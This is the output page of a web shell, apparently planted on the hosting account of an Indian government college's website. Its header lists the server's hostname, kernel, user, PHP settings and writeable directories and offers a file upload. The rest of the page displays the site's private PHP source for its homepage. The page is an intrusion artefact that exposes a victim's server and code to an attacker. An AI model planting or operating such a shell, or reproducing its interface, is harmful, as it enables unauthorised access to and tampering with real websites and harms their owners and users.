Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux server.xvl.jdw.mybluehostin.me 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
User : gdckalyandurg ( 1043)
PHP Version : 8.2.30
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/gdckalyandurg/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/gdckalyandurg/public_html/index.php2
<?php
include("config.php");

if(isset($_GET['id'])){
    $id = $_GET['id'];
    
    if($id == 'IQAC_Meetings'){
        header("location: page.php?type=iqac&id=iqac-meetings");
    } elseif($id == 'RTI'){
        header("location: page.php?id=rti");
    }
}

$news = $db->select('news', '*', array('news_type'=>'news'), 'ORDER BY id DESC');
$announcements = $db->select('news', '*', array('news_type'=>'announcements'), 'ORDER BY id DESC');
$slides = $db->selectAll('slides', '*', 'ORDER BY sort_order ASC');
?>
<!DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4816581207609961"
     crossorigin="anonymous"></script>
<title>SVGM Government Degree College, Kalyandurg</title>
<!-- Stylesheets -->
<link href="css/bootstrap.css" rel="stylesheet">
<link href="css/revolution-slider.css" rel="stylesheet">
<link href='https://fonts.googleapis.com/css?family=Libre+Baskerville:400,400italic,700' rel='stylesheet' type='text/css'>
<link href="css/style.css" rel="stylesheet">
<link href="css/extra.css" rel="stylesheet">
<link href="css/font-awesome.css" rel="stylesheet">
<link rel='stylesheet' id='google-font-css'  href='//fonts.googleapis.com/css?family=Roboto%3A400%2C300%2C500%2C400italic%2C700%2C500italic%2FScript%3Alatin-ext%7CBitter&#038;ver=4.8.8' type='text/css' media='all' />
<!--Favicon-->
<link rel="shortcut icon" href="images/gcm.png" type="image/x-icon">
<link rel="icon" href="images/gcm.png" type="image/x-icon">
<!-- Responsive -->
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<link href="css/responsive.css" rel="stylesheet">
<!-- Start WOWSlider.com HEAD section -->
<link rel="stylesheet" type="text/css" href="engine1/style.css" />

<!-- End WOWSlider.com HEAD section -->
<!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
<!--[if lt IE 9]><script src="js/respond.js"></script><![endif]-->
</head>
<body>
<div class="page-wrapper">

<?php include("includes/header.php"); ?>

  <!--Main Slider-->
  <section class="main-slider">
    <div class="col-sm-9 col-xs-12">
      <div class="tp-banner-container">
        <!-- Start WOWSlider.com BODY section -->
        <div id="wowslider-container1" style="box-shadow: 0 2px 4px blue;border-radius: 10px">
          <div class="ws_images">
            <ul>
              <?php $i=1; foreach($slides as $slide){ ?>
              <li><img src="<?php echo $admin_url.$slide->image; ?>"   alt="1" style="box-shadow: 0 2px 4px blue;border-radius: 10px"  id="wows1_<?php echo $i; ?>"/></li>
              <?php $i++; } ?>
              
            </ul>
          </div>
          <div class="ws_bullets">
            <div> <a href="#" title="1"><span><img src="data1/tooltips/1.jpg" alt="1"/>1</span></a> <a href="#" title="2"><span><img src="data1/tooltips/2.jpg" alt="2"/>2</span></a> <a href="#" title="3"><span><img src="data1/tooltips/3.jpg" alt="3"/>3</span></a> <!--<a href="#" title="4"><span><img src="data1/tooltips/4.jpg" alt="4"/>4</span></a> <a href="#" title="5"><span><img src="data1/tooltips/5.jpg" alt="5"/>5</span></a> <a href="#" title="6"><span><img src="data1/tooltips/6.jpg" alt="6"/>6</span></a>--> </div>
          </div>
          <div class="ws_script" style="position:absolute;left:-99%"><a href="#"></a> </div>
          <div class="ws_shadow"></div>
        </div>
        <script type="text/javascript" src="engine1/wowslider.js"></script>
        <script type="text/javascript" src="engine1/script.js"></script>
        <!-- End WOWSlider.com BODY section -->
      </div>
    </div>
    <div class="col-sm-3 col-xs-12">
      <div class="panel panel-primary">
        <div class="panel-heading">
          <h4 class="panel-title" align="center">NEWS & ANNOUNCEMENTS</h4>
        </div>
        <div class="panel-body" style="height:320px">
          <marquee  direction="up" SCROLLDELAY=200 BEHAVIOR=scroll  onmouseover="this.stop();" onMouseOut="this.start();" style="height:295px">
          <?php foreach($news as $new){ ?>
          
		   <a href="<?php echo $admin_url.$new->file; ?>" style="color:blue" target="_blank"><?php echo $new->title; ?></a> <img src="images/new-gif-image.gif" width="20px"><br>
		  <?php } ?>
          
          </marquee>
        </div>
      </div>
    </div>
  </section>
  <div class="col-xs-12" style="background-color: #012f5d;color:white;height: 40px;margin-top: -15px">
    <h4 style="margin-top: 3px"> Welcome to SVGM Govt. College, Kalyandurg</h4>
  </div>
  <!--  <section class="welcome-section">-->
    <div class="auto-container">
      <div class="welcome-content">
        <div class="col-sm-9 col-xs-12"> <br>
          <div class="sec-title">
            <h3 style="color:#ff6600;"><strong>WELCOME TO SVGM GOVERNMENT COLLEGE, KALYANDURG</strong></h3>
          </div>
          <div class="text" align="justify">
            <div class="col-sm-3 col-xs-12"> <img src="images/principal-2.jpg" style="border-radius: 10px;box-shadow: 0 1px 0 1px #1234"  width="200px">
              <h4 style="color: green"> Dr.D.Jayarama Reddy</h4>
              <p style="float: left;">Principal &nbsp;&nbsp;&nbsp; Ph.D</p>
            </div>
      <p align="justify">The institution has dedicated itself to the service of society by educating students and preparing professional educators for all levels. It is one of the premier institutions in the area.</p>
      <p align="justify">S.V.G.M Govt Degree College , Anantapur was established in the year 1984. S.V.G.M. Govt. Degree College was started in 1984 with BA & B.Com. Course with 140 students. But now that merge number has enlarged into 1270 . B.Sc. Courses with MPC and BZC were introduced in 1998. The self funding course in B.A., EPRD was started in 2002 while the B.Com CA and B.Sc., MPCs courses were introduced in 2004. The THP group in B.A. The 29 years old college is under the Jurisdiction of S.K. University. Anantapur . The College was started initial in the Govt. Junior College buildings and later it shifted in to own building in 2004. The college new building is constructed with a plinth area of 1,650 sq.mts and with play ground.</p>
      <p align="justify">The institution has dedicated itself to the service of society by educating students and preparing professional educators for all levels. It is one of the premier institutions in the area.</p>
      <p align="justify">We have a long history of excellence and repute and have a solemn commitment to address ourselves vigorously to the needs arising from a dynamic and rapidly changing society by aligning ourselves to the requirement of the new age of teaching, conducting research, disseminating new knowledge and developing application for existing knowledge. We also believe in preparing life-long learners who are able to apply their knowledge in a cross cultural and diverse society. </p>
            <h2> 
            <a href="http://www.apcce.gov.in/" target="_blank" class="btn btn-primary" style="width: 23%;border-radius: 5px">CCE</a> 
            <a href="https://swayam.gov.in/" target="_blank" class="btn btn-primary" style="width: 23%;border-radius: 5px">SWAYAM</a> 
            <a href="https://www.swayamprabha.gov.in/" target="_blank" class="btn btn-primary" style="width: 23%;border-radius: 5px">SWAYAM PRABHA</a> 
            <a href="https://onlinecourses.nptel.ac.in/" target="_blank" class="btn btn-primary" style="width: 23%;border-radius: 5px">NPTEL</a><br>
              <a href="http://iamshub.com/" target="_blank" class="btn btn-primary" style="width: 23%;border-radius: 5px">IAMS</a> 
              <a href="https://www.youtube.com/channel/UCpSzMrVC36NictxkhZR1Kpw" target="_blank" class="btn btn-primary" style="width: 23%;border-radius: 5px">MANA TV</a> 
              <a href="http://www.apsche.org/apsche_new/" target="_blank" class="btn btn-primary" style="width: 23%;border-radius: 5px">APSCHE</a> 
              <a href="https://mhrd.gov.in/"  target="_blank" class="btn btn-primary" style="width: 23%;border-radius: 5px">MHRD</a> </h2>
              
          </div>
        </div>
        <div class="col-sm-3 col-xs-12"> <br>
          <div class="panel panel-primary">
            <div class="panel-heading">
              <h3 class="panel-title" align="center">Quick Links</h3>
            </div>
            <div class="panel-body" align="center">
              <h2><a href="page.php?type=time-tables&id=master-time-table" class="btn btn-primary" style="width: 80%;border-radius: 5px">Curricular Transaction Plan</a></h2>
              <h2><a href="page.php?id=nirf" class="btn btn-primary" style="width: 80%;border-radius: 5px">NIRF</a></h2>
              <h2><a href="press.php" class="btn btn-primary" style="width: 80%;border-radius: 5px">IN PRESS</a></h2>
              <h2><a href="page.php?id=ugc" target="_blank" class="btn btn-primary" style="width: 80%;border-radius: 5px">UGC</a></h2>
              <h2><a href="page.php?id=rusa" target="_blank" class="btn btn-primary" style="width: 80%;border-radius: 5px">RUSA</a></h2>
              <h2><a href="updates.php?type=naac&id=SSR" class="btn btn-primary" style="width: 80%;border-radius: 5px">NAAC</a></h2>
              <h2><a href="https://ndl.iitkgp.ac.in/" target="_blank" class="btn btn-primary" style="width: 80%;border-radius: 5px">National Digital Library</a></h2>
              <h2><a href="page.php?id=alumni" class="btn btn-primary" style="width: 80%;border-radius: 5px">Alumni</a></h2>
              <h2><a href="https://cceinfo.ap.gov.in/" class="btn btn-primary" style="width: 80%;border-radius: 5px">Online Admissions</a></h2>
              <h2><a href="page.php?type=newsletter&id=newsletter" class="btn btn-primary" style="width: 80%;border-radius: 5px">News Letter's</a></h2>
            </div>
          </div>
          <div class="panel panel-primary">
            <div class="panel-heading" style="background-color: #ff6600">
              <h1 class="panel-title" style="font-size: 20px" align="center"><b>EXAMINATION CELL </b></h1>
              <h6 align="center" style="color:yellow"> LATEST ANNOUNCEMENTS</h6>
            </div>
            <div class="panel-body" style="height:300px; padding:0 15px!important;">
              <h2> <a href="exam-results/index.php" style="color:white" target="_blank" class="btn btn-primary" style="width: 80%;border-radius: 5px">Results </a> </h2>
              <hr>
              <ul style="list-style-type: none">
                <marquee  direction="up" SCROLLDELAY=200 BEHAVIOR=scroll onMouseOver="this.stop();" onMouseOut="this.start();" style="height:200px;">


                
                <?php foreach($announcements as $announcement){ ?>
				<li> <a href="<?php echo $admin_url.$announcement->file; ?>" style="color:blue" target="_blank"><?php echo $announcement->title; ?></a> <img src="images/new-gif-image.gif" width="50px"></li>
				<?php } ?>
              
                </marquee>
              </ul>
            </div>
          </div>
        </div>
      </div>
      <div class="row clearfix"> </div>
    </div>
  <!--</section>-->
</div>
<?php include("includes/footer.php"); ?>
</body>
</html>

Al-HUWAITI Shell